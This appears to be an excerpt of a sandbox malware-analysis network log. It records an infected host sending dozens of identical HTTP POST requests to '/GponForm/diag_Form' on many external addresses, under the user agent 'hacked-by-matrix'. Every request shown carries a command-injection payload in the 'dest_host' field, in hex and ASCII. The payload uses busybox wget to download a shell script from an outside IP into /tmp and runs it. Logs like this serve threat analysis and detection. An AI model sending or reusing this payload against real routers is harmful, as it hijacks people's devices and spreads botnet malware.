                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1315192.168.2.1356280212.190.57.143443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716350079 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1316192.168.2.13398445.24.221.54443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716373920 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1317192.168.2.1349680109.67.187.91443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716384888 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1318192.168.2.134649642.97.63.213443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716392994 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1319192.168.2.1349448212.59.164.39443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716413021 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1320192.168.2.13377605.231.192.56443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716448069 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1321192.168.2.1356084118.120.1.36443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716453075 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1322192.168.2.1337994109.19.194.18443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716470957 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1323192.168.2.13461185.238.188.82443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716548920 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1324192.168.2.1349474109.176.242.192443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716551065 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1325192.168.2.1354328212.113.232.223443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716562033 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1326192.168.2.1336002118.36.246.61443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716586113 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1327192.168.2.1353732109.245.179.172443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716639996 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1328192.168.2.1349912118.54.207.182443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716661930 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1329192.168.2.1347684118.21.220.79443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716665983 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1330192.168.2.1359612109.92.241.236443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716665983 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1331192.168.2.1346878109.186.95.66443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716675043 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1332192.168.2.1333886212.125.35.19443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716703892 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1333192.168.2.133669442.240.246.89443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716733932 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1334192.168.2.135281642.36.219.80443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716737986 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1335192.168.2.135120242.204.244.247443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716758013 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1336192.168.2.13608545.92.28.26443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716778040 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1337192.168.2.1346714109.11.164.128443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.716792107 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
